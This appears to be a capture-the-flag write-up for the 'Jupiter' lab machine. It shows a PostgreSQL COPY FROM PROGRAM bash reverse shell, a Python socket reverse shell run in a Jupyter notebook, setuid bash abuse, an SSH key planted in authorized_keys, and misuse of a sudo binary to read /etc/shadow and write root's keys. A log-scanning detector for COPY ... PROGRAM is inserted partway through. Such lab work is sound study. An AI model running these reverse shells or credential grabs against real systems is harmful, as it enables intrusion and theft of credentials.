Jupiter
Enumeration
Ports and Services
Software Installed:
- Grafana v9.5.2 (cfcea75916)
Nmap Scan Results:
DNS Subdomain:
kiosk.jupiter.htb:
Raw SQL is sent in the HTTP request:
POST /ap/ds/query
Initial Foothold
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
Remote Code Execution:
Result
Received a reverse shell as postgres
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.14.92/8888 0>&1\"'
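As an added example (not part of this writeup), here is a small defender-side Python detector that scans PostgreSQL statement logs for the COPY ... FROM PROGRAM pattern used above, and also catches the TO PROGRAM direction and statements split over continuation lines. The log lines, role name and database name are constructed for illustration, and the default log_line_prefix layout with log_statement = 'all' is assumed.

```python
import re
from collections import namedtuple

# Constructed sample lines (not captured from the box) in PostgreSQL's default
# log_line_prefix '%m [%p] %q%u@%d ' shape with log_statement = 'all'; names are invented.
SAMPLE_LOG = """\
2023-10-11 16:02:19.901 UTC [2371] grafana@appdb LOG:  statement: DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'
2023-10-11 16:02:25.117 UTC [2372] grafana@appdb LOG:  statement: copy   t   from  program   'echo ''hi'''
2023-10-11 16:02:31.004 UTC [2373] backup@appdb LOG:  statement: COPY moons FROM '/var/lib/postgresql/moons.csv' CSV HEADER
2023-10-11 16:02:40.250 UTC [2374] grafana@appdb LOG:  statement: COPY t
\tTO PROGRAM 'uname -a'
"""

# Assumed prefix layout; adjust LINE_RE if your log_line_prefix differs.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement:\s+(?P<stmt>.*)$"
)

# COPY <table|(query)> [(columns)] FROM|TO PROGRAM '<cmd>': both directions hand the
# string to the server's shell. '' is the SQL escape for a quote inside the string.
COPY_PROGRAM_RE = re.compile(
    r"\bCOPY\s+(?:\([^)]*\)|\S+)\s*(?:\([^)]*\)\s*)?(?:FROM|TO)\s+PROGRAM\s+'((?:[^']|'')*)'",
    re.IGNORECASE,
)
Finding = namedtuple("Finding", "pid user db command")

def iter_statements(log_text):
    # One dict per logged statement; indented lines are continuations of a
    # multi-line statement and are joined onto the previous entry.
    current = None
    for line in log_text.splitlines():
        if current is not None and line[:1].isspace():
            current["stmt"] += "\n" + line.strip()
            continue
        if current is not None:
            yield current
        m = LINE_RE.match(line)
        current = m.groupdict() if m else None
    if current is not None:
        yield current

def find_copy_program(log_text):
    # Every COPY ... PROGRAM statement, with the shell command unescaped.
    findings = []
    for entry in iter_statements(log_text):
        for cmd in COPY_PROGRAM_RE.findall(entry["stmt"]):
            findings.append(Finding(entry["pid"], entry["user"], entry["db"], cmd.replace("''", "'")))
    return findings
```

Any hit from a role that only needs SELECT (as the Grafana datasource role here should) is a strong signal; the fix is to run datasource queries as a role without pg_execute_server_program / superuser rights.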
There is an odd file in /dev/shm: network-simulation.yml
Contents:
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/python3
args: -m http.server 80
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/curl
args: -s server
start_time: 5s
File is writable by everyone:
Changed the server process to ping -c 1 10.10.14.92 and waited.
After several attempts, no reverse shell worked: special characters caused
issues and I couldn't call shell scripts. I ended up copying the /bin/bash
executable to /dev/shm and giving it the setuid bit as user juno.
Result:
Couldn't elevate from /dev/shm.
Redid the copy and setuid in /tmp:
Result:
authorized_keys is empty. Generated a key pair and added the public key:
echo 'ssh-rsa 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 rogue@kali' > authorized_keys
SSH as Juno
User.txt Proof Screenshot
Privilege Escalation
User jovian is running a python job:
jovian is a member of the science and sudo groups:
Interesting ports:
Port 3000 is the port used by kiosk:
Group-writable files (science group):
Port 8888
Found token in /opt/solar-flares/logs/jupyter-2023-10-11-16.log
Created a new notebook and entered the following in the In[] field:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.92",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Result:
Logged in as jovian. Output of sudo -l for jovian:
Running sattrack, it complains that it cannot find a configuration file. Running
strings | grep conf on the binary reveals it is looking for /tmp/config.
Config located in /usr/local/share/sattrack:
Chmodded the file to 777 so juno could edit it (from the SSH session) and modified a TLE
source to fetch the /etc/shadow file:
Result:
Copied juno's authorized_keys to /tmp and edited config.json to copy the file
to /root/.ssh:
Config.json
{
"tleroot": "/root/.ssh/",
"tlefile": "weather.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"file:///tmp/authorized_keys"
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
SSH as root
Root screenshot here: